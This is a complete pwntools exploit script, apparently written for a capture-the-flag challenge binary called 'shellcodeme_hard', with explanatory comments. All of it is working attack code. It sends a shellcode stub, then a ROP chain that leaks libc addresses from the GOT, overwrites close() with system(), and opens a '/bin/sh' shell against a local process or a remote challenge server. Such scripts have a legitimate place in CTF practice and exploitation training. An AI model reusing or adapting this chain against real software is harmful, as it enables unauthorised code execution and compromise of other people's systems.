#!/usr/bin/env python2
from pwn import *
def exploit():
    """Drive the two-stage interaction with the tube `p` opened in __main__.

    Stage 1 answers the "code?" prompt with a short assembled stub.  Stage 2
    sends a pwntools ROP chain that prints GOT entries with puts() (libc
    address leak), overwrites the GOT entry of close() via read(), and then
    calls close() with a buffer in .bss.

    Uses the module globals assigned in __main__: `p` (tube), `name`
    (path of the binary), `binary` (ELF) and `libc` (ELF).  Python 2 only:
    the str/bytes handling (`ljust` with a NUL character, `str(rop)`) relies
    on Python 2 string semantics.
    """
    # setup fgets
    # Stage 1 stub: pop rbp, push 0x4008A9 seven times, then `ret 0x40`.
    # 0x4008A9 is presumably an address inside the target binary that leads
    # back into fgets (per the comment above) — verify against the
    # disassembly; it is hard-coded here and not derived from `binary`.
    payload = """
pop rbp
push 0x4008A9
push 0x4008A9
push 0x4008A9
push 0x4008A9
push 0x4008A9
push 0x4008A9
push 0x4008A9
ret 0x40
"""
    p.sendlineafter("code?", asm(payload))
    # Stage 2: chain built from gadgets found in the target binary.
    rop = ROP(name)
    # Print the resolved libc pointers stored in the GOT entries of close
    # and fgets (puts stops at the first NUL byte of the pointer).
    rop.puts(binary.got["close"])
    rop.puts(binary.got["fgets"])
    # Overwrite close's GOT entry with the 8 bytes sent further down
    # (p64(system)).  Full RELRO would make the GOT read-only and block
    # this write.
    rop.read(0, binary.got["close"])
    # Second puts(fgets@got): its output line is consumed by the
    # p.recvline() after the system address is sent — presumably a sync
    # point; confirm.
    rop.puts(binary.got["fgets"])
    # Read the string sent further down into .bss+0x800, then call close()
    # — by then resolving to system() — with that buffer as its argument.
    rop.read(0, binary.bss(0x800))
    rop.close(binary.bss(0x800))
    # Wait for a keypress so the debugger attached in __main__ can be set up
    # before the chain is sent.
    pause()
    p.sendline(str(rop))
    # Discard the line printed before the two leaks (presumably an echo or
    # prompt — confirm against the target's output).
    p.recvline()
    # Each leak is a 64-bit pointer printed by puts; its high bytes are zero
    # and therefore missing, so pad back to 8 bytes before unpacking.
    close_leak = u64(p.recvline(keepends=False).ljust(8, "\x00"))
    fgets_leak = u64(p.recvline(keepends=False).ljust(8, "\x00"))
    # Rebase libc on the close() leak; fgets_leak is only logged, never used.
    libc.address = close_leak - libc.symbols["close"]
    log.info("close_leak: 0x{:x}".format(close_leak))
    log.info("fgets_leak: 0x{:x}".format(fgets_leak))
    log.info("libc.address: 0x{:x}".format(libc.address))
    # Consumed by read(0, got["close"]) in the chain above.
    p.send(p64(libc.symbols["system"]))
    # Output of the second puts(fgets@got).
    p.recvline()
    # Consumed by read(0, bss+0x800) in the chain above: the argument that
    # close()/system() receives.
    p.send("/bin/sh\x00")
    p.interactive()
if __name__ == "__main__":
    # Target binary; `name` is also what ROP(name) in exploit() parses.
    name = "./shellcodeme_hard"
    binary = ELF(name)
    # gdb.attach() below opens its window in a horizontal tmux split.
    context.terminal=["tmux", "sp", "-h"]
    # context.log_level = 'debug'
    # context.timeout = 5
    context.arch = "amd64"
    # Any extra command-line argument selects the remote target (`sys` comes
    # from the pwn star-import).  The bundled libc must be the same build as
    # the remote's: exploit() rebases it from a single close() leak and
    # computes system() from that base.
    if len(sys.argv) > 1:
        p = remote("shellcodeme.420blaze.in", 4200)
        libc = ELF("./libc6_2.19-0ubuntu6.14_amd64.so")
    else:
        # Local run against the system libc with an empty environment.
        # p = process(name, env={'LD_PRELOAD': libc_name})
        p = process(name, env={})
        libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
        # Break on system() so the call made through the overwritten GOT
        # entry can be inspected; exploit() pauses before sending the chain.
        gdb.attach(p, """
b system
c
""")
    exploit()